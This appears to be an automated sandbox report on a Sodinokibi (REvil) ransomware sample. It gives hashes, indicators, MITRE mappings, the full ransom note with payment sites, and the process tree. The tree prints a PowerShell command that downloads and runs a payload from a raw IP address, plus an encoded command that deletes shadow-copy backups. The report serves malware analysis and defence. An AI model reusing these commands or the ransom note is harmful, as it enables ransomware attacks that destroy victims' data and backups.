sodinokibi | dfb5ad14ea6a191cabe5996c4433e3a6b707fb4e5f571a7e6bbc53d6593ee1a7

General

Target

398e244bda5a94afa8c2c988f37b2cd6.bat
Size

215B
MD5

3e3fadb01dd3a604d3d369bc51bb3a6f
SHA1

6afb2f7dbd13b3f1aa3b86fda6dd1e44b513f195
SHA256

dfb5ad14ea6a191cabe5996c4433e3a6b707fb4e5f571a7e6bbc53d6593ee1a7
SHA512

100b892215e1896a9b372d21fa4769da6cc7698703cc779f2674dc585d3b03633e7f30aae9fdb4011816db41a775b33fe0853d766c308f3af863c1aa82a1c464

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/398e244bda5a94afa8c2c988f37b2cd6

Extracted

Path

C:\x04r1y-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension x04r1y. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8519576D4C181A85 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/8519576D4C181A85 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: jwtfO9GAt53J5rNvUdI2lc0BUErn0sP+Ylp5hvRcdzBYaFZKdB5bMzr4pdqurZOv 3Uab+Pv8lWlXnszRI2ftgfFeuiYh1vjPM+j5rU9TC5DvoefkA32OiiD5nMeQPaEf MSYVidIpsB8y/C2zHvCdFeP59dVYCPHSyGpD7zJVr96EqLRr7bz2MNO2M1Gm+fsH pO7HJX595gcvzQ7xdeySaF0Em848BSIyGTRDUZEcxvf1blpyewah1TAg6qXL+uN9 ZR3A4Gbt1dkHgIno1TRrQx1oqOnHCJOnA3eVyxi9qj0lohB2sy4LMngvEl7WaIhK gity4pfGjmAx8SKZr3CxaU4AoA9CBiSl2CgP7bFXhMVLTNRbDZhVD5EoyFXY9/1L KGKnHMe6ckf/881kQa97M1mlU+6h19T4uI7prFWkdQ4JCRZkwXgqJKB9dp3bv0uA lsUVk3T9ONatKQ7Tk5vq9revXh3mYNVDl5Lvxf7oz3SO5ZukcvO6IN7aAiJq1Gtz dTXm9ZXOQxNap9ZrUW39iHu2O/F9VFaYrzG5CMsHh/UNFXbRsLXSvx+OzcI8nhRK gkIgGbFDrgIABEm4nIx1TwrGDy50E+/IV8dwLm0N0V1drwqMNlaUYiUrx1qGg9Ug SD5vujhnIYRsxz/DYehRNR63E/Nb+GgIvuFs1RC2Cdxv6dxmUwb9uAa4/aqO9B3h ellzDsPZBLAeijbp/sN6F/u3mCUxIyoE+keYt0tcTOWHmHHjDKLtfJzeKVXqz45G iSzR7hVSsYVgN6cQfxaGy0HulzM5olfbKDDo8XOlA7305s+umuHUdPskUuiUGEU6 Fdp9sEGmk0hEI9MS4rsf0YtzuyhRxBPJKcICYki8/ElDpSVuBVjeThBsTWyvWEQJ rahfZgtwnBF8bI05cP8O8ehYa9X2F5H/vVrBnKqtFxvHXkrNY3oBAM+Ue0v+DBns NI3Xn0CUbm8vsgFNB0Y7MB5MtpI29b8+Be+6T6t+7txjDHzKNOIs5bxi+KbrLiZ8 MqMkejAY1NSimsETjMFe87efPlRTzYlLkebzoItPWgnoUoIfQv/tHvv9OKQEcZ3X VZ2Jdn8OAtDEIKWCjc3gxSNNIQsGwhzzUstMoTMMjS9zVZ3DRPwWm8T2QTL2YXxb NAsVXHEASkqwNXiWpbPjSrg8KDAm8M2Fc6KXMU3Eo5Kk9tRvklCZ0ommejyooth4 Y4CoNPrXQ2Ga+gLRs4cHLnl/Rk2s7bwW5f4VfzhDBWqnnoH4JJZBX2T4F7j+FaO5 npwRhrpJLPI0NCBiEQm+TFDXrsc+30i0su/Js6OtDiY= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8519576D4C181A85

http://decryptor.cc/8519576D4C181A85

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 296 powershell.exe

flow	pid	process
3	296	powershell.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\PushDeny.crw => \??\c:\users\admin\pictures\PushDeny.crw.x04r1y	powershell.exe
File renamed	C:\Users\Admin\Pictures\RestartReset.crw => \??\c:\users\admin\pictures\RestartReset.crw.x04r1y	powershell.exe
File renamed	C:\Users\Admin\Pictures\AssertDisable.tif => \??\c:\users\admin\pictures\AssertDisable.tif.x04r1y	powershell.exe
File renamed	C:\Users\Admin\Pictures\DenyJoin.tif => \??\c:\users\admin\pictures\DenyJoin.tif.x04r1y	powershell.exe
File renamed	C:\Users\Admin\Pictures\DisconnectEdit.raw => \??\c:\users\admin\pictures\DisconnectEdit.raw.x04r1y	powershell.exe
File renamed	C:\Users\Admin\Pictures\InstallNew.crw => \??\c:\users\admin\pictures\InstallNew.crw.x04r1y	powershell.exe
File renamed	C:\Users\Admin\Pictures\InvokeMeasure.tif => \??\c:\users\admin\pictures\InvokeMeasure.tif.x04r1y	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\DismountEdit.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\DismountEdit.tiff => \??\c:\users\admin\pictures\DismountEdit.tiff.x04r1y	powershell.exe
File renamed	C:\Users\Admin\Pictures\OutComplete.tif => \??\c:\users\admin\pictures\OutComplete.tif.x04r1y	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2f3rn7jil0t3.bmp"	powershell.exe

Drops file in Program Files directory 19 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\CompleteConvertFrom.xlsx	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\x04r1y-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\x04r1y-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\LimitMeasure.pcx	powershell.exe
File opened for modification	\??\c:\program files\RedoConvert.xht	powershell.exe
File opened for modification	\??\c:\program files\RemoveExpand.gif	powershell.exe
File opened for modification	\??\c:\program files\ShowInstall.eps	powershell.exe
File opened for modification	\??\c:\program files\SkipConfirm.mpeg	powershell.exe
File opened for modification	\??\c:\program files\UpdateSuspend.gif	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\x04r1y-readme.txt	powershell.exe
File created	\??\c:\program files\x04r1y-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\FindSelect.contact	powershell.exe
File opened for modification	\??\c:\program files\InstallShow.mpp	powershell.exe
File opened for modification	\??\c:\program files\JoinRegister.vssx	powershell.exe
File opened for modification	\??\c:\program files\ResizeConnect.TTS	powershell.exe
File opened for modification	\??\c:\program files\TraceRegister.wmf	powershell.exe
File opened for modification	\??\c:\program files\ExpandProtect.dib	powershell.exe
File opened for modification	\??\c:\program files\UndoUpdate.vsdm	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\x04r1y-readme.txt	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

296 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

296 powershell.exe
296 powershell.exe
296 powershell.exe
1236 powershell.exe
1236 powershell.exe

pid	process
296	powershell.exe

pid	process
296	powershell.exe
296	powershell.exe
296	powershell.exe
1236	powershell.exe
1236	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	296	powershell.exe
Token: SeDebugPrivilege	296	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeBackupPrivilege	1976	vssvc.exe
Token: SeRestorePrivilege	1976	vssvc.exe
Token: SeAuditPrivilege	1976	vssvc.exe
Token: SeTakeOwnershipPrivilege	296	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1456 wrote to memory of 296	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 296	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 296	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 296	1456	cmd.exe	powershell.exe
PID 296 wrote to memory of 1236	296	powershell.exe	powershell.exe
PID 296 wrote to memory of 1236	296	powershell.exe	powershell.exe
PID 296 wrote to memory of 1236	296	powershell.exe	powershell.exe
PID 296 wrote to memory of 1236	296	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\398e244bda5a94afa8c2c988f37b2cd6.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/398e244bda5a94afa8c2c988f37b2cd6');Invoke-DLBAJCKU;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/296-5-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/296-21-0x00000000061F0000-0x00000000061F1000-memory.dmp

Filesize
4KB

Download
memory/296-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/296-14-0x0000000006220000-0x0000000006221000-memory.dmp

Filesize
4KB

Download
memory/296-13-0x0000000006080000-0x0000000006081000-memory.dmp

Filesize
4KB

Download
memory/296-8-0x0000000006020000-0x0000000006021000-memory.dmp

Filesize
4KB

Download
memory/296-0-0x0000000000000000-mapping.dmp

Download
memory/296-4-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/296-3-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/296-2-0x0000000000A10000-0x0000000000A11000-memory.dmp

Filesize
4KB

Download
memory/296-1-0x00000000744A0000-0x0000000074B8E000-memory.dmp

Filesize
6.9MB

Download
memory/1236-23-0x0000000000000000-mapping.dmp

Download
memory/1236-25-0x00000000744A0000-0x0000000074B8E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads